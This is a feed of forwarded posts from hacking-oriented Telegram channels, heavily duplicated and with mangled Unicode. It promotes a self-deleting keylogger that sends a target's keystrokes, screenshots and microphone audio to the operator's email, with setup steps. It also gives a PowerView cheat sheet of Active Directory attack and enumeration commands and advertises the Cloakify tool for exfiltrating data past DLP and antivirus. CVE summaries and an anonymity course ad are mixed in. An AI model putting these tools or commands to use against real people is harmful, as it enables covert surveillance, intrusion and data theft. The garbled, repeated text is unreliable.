Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected. Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
#Hacking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
β’ DOWNLOAD : https://github.com/aydinnyunus/Keylogger
β’Set your own MAIL and PASSWORD on "keylogger.py".
β’Run keylogger.py on Target Computer
β’Every 10 seconds,You Get the Data from the Target Computer
β’If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected. Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
#Hacking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
β’ DOWNLOAD : https://github.com/aydinnyunus/Keylogger
β’Set your own MAIL and PASSWORD on "keylogger.py".
β’Run keylogger.py on Target Computer
β’Every 10 seconds,You Get the Data from the Target Computer
β’If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - aydinnyunus/Keylogger: Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail. - aydinnyunus/Keylogger
Forwarded from DailyCVE
Dailycve
AIRDROPX BORN security vulnerability | CVE
Details:
AIRDROPX BORN is an AIRDROPX BORN API token service which can be used for Bitcoin and other network currencies to be transferred and exchanged. Version 2019-05-29 of AIRDROPX BORN and older versions have a security flaw.
The flaw derives from a constructor'sβ¦
AIRDROPX BORN is an AIRDROPX BORN API token service which can be used for Bitcoin and other network currencies to be transferred and exchanged. Version 2019-05-29 of AIRDROPX BORN and older versions have a security flaw.
The flaw derives from a constructor'sβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A cheat sheet that contains common enumeration and attack methods for Windows Active Directory:
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
Enum Groups and Group Members:
Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>
Enum OUs:
Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
AVAIBLE HERE Β» : https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A cheat sheet that contains common enumeration and attack methods for Windows Active Directory:
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
Enum Groups and Group Members:
Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>
Enum OUs:
Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest <ForestName>
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
AVAIBLE HERE Β» : https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methodsβ¦
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Is the iPhone folding screen coming? Two prototypes are subject to preliminary testing.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection:
Amphibians (scientific names)
Belgian Beers
Desserts in English, Arabic, Thai, Russian, Hindi, Chinese, Persian, and Muppet (Swedish Chef)
Emoji
evadeAV (smallest cipher space, x3 payload size)
GeoCoords World Capitals (Lat/Lon)
GeoCaching Coordinates (w/ Site Names)
IPv4 Addresses of Popular Websites
MD5 Password Hashes
PokemonGo Monsters
Shortened URLs pointing to different Youtube videos of Rick Astley's "Never Gonna Give You Up"
Ski Resorts
Status Codes (generic)
Star Trek characters
Top 100 Websites
World Beaches
World Cup Teams
Prepackaged scripts for adding noise / entropy to your cloaked payloads:
prependEmoji.py: Adds a randomize emoji to each line
prependID.py: Adds a randomized ID tag to each line
prependLatLonCoords.py: Adds randomized LatLong coordinates to each line
prependTimestamps.py: Adds timestamps (log file style) to each line
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/TryCatchHCF/Cloakify.git
2) cd Cloakify
3) look at examples inhttps://github.com/TryCatchHCF/Cloakify
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection:
Amphibians (scientific names)
Belgian Beers
Desserts in English, Arabic, Thai, Russian, Hindi, Chinese, Persian, and Muppet (Swedish Chef)
Emoji
evadeAV (smallest cipher space, x3 payload size)
GeoCoords World Capitals (Lat/Lon)
GeoCaching Coordinates (w/ Site Names)
IPv4 Addresses of Popular Websites
MD5 Password Hashes
PokemonGo Monsters
Shortened URLs pointing to different Youtube videos of Rick Astley's "Never Gonna Give You Up"
Ski Resorts
Status Codes (generic)
Star Trek characters
Top 100 Websites
World Beaches
World Cup Teams
Prepackaged scripts for adding noise / entropy to your cloaked payloads:
prependEmoji.py: Adds a randomize emoji to each line
prependID.py: Adds a randomized ID tag to each line
prependLatLonCoords.py: Adds randomized LatLong coordinates to each line
prependTimestamps.py: Adds timestamps (log file style) to each line
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/TryCatchHCF/Cloakify.git
2) cd Cloakify
3) look at examples inhttps://github.com/TryCatchHCF/Cloakify
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - TryCatchHCF/Cloakify: CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into listβ¦
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whi...
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from DailyCVE
Dailycve
X-STREAM Improper Authentication Vulnerability | CVE
Details:
Rosemount X-STREAM is an Emerson-provided gas analyzer. An inappropriate authentication flaw is used in Rosemount X-STREAM ( CWE-287 ).
Via a specially designed URL, logs and backup data can be accessed by a remote third party and confidentialβ¦
Rosemount X-STREAM is an Emerson-provided gas analyzer. An inappropriate authentication flaw is used in Rosemount X-STREAM ( CWE-287 ).
Via a specially designed URL, logs and backup data can be accessed by a remote third party and confidentialβ¦
β β β Uππ»βΊπ«Δπ¬πβ β β β
π΅οΈ Anonymity and security courses: //Original russian course:
1. Setting up the working environment. Improved and revised work with virtual machines (perhaps the only analogy with the previous course);
2. Fine work with different cryptocurrencies;
3. Selection, rental, administration and protection of VPS (70% of the work in the course takes place on servers);
4. Lifting and configuring services on VPS and working with them;
5. Fine work with Tor services;
6. Squeezing the maximum out of the Raspberry Pi;
7. Anonymous routers;
8. Lifting, configuring and administering the Tor node;
9. Work with PC hardware. Removing hardware bookmarks;
10. Risk minimization and ... authoring.
Watch & download:
https://codeby.net/threads/paranoid-ii-kurs-po-anonimnosti-i-bezopasnosti.69596/
Enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π΅οΈ Anonymity and security courses: //Original russian course:
1. Setting up the working environment. Improved and revised work with virtual machines (perhaps the only analogy with the previous course);
2. Fine work with different cryptocurrencies;
3. Selection, rental, administration and protection of VPS (70% of the work in the course takes place on servers);
4. Lifting and configuring services on VPS and working with them;
5. Fine work with Tor services;
6. Squeezing the maximum out of the Raspberry Pi;
7. Anonymous routers;
8. Lifting, configuring and administering the Tor node;
9. Work with PC hardware. Removing hardware bookmarks;
10. Risk minimization and ... authoring.
Watch & download:
https://codeby.net/threads/paranoid-ii-kurs-po-anonimnosti-i-bezopasnosti.69596/
Enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from DailyCVE
π΅Tenda AC1200 input validation error vulnerability:
https://dailycve.com/tenda-ac1200-input-validation-error-vulnerability
https://dailycve.com/tenda-ac1200-input-validation-error-vulnerability
Dailycve
Tenda AC1200 input validation error vulnerability | CVE
Details:
A protection flaw is present on Tenda AC1200 (Model AC6) 15.03.06.51 multi smartphones. The weakness emerges from a huge HTTP POST request sent to the API for password update, which causes the router to crash and enter an endless initialization β¦
A protection flaw is present on Tenda AC1200 (Model AC6) 15.03.06.51 multi smartphones. The weakness emerges from a huge HTTP POST request sent to the API for password update, which causes the router to crash and enter an endless initialization β¦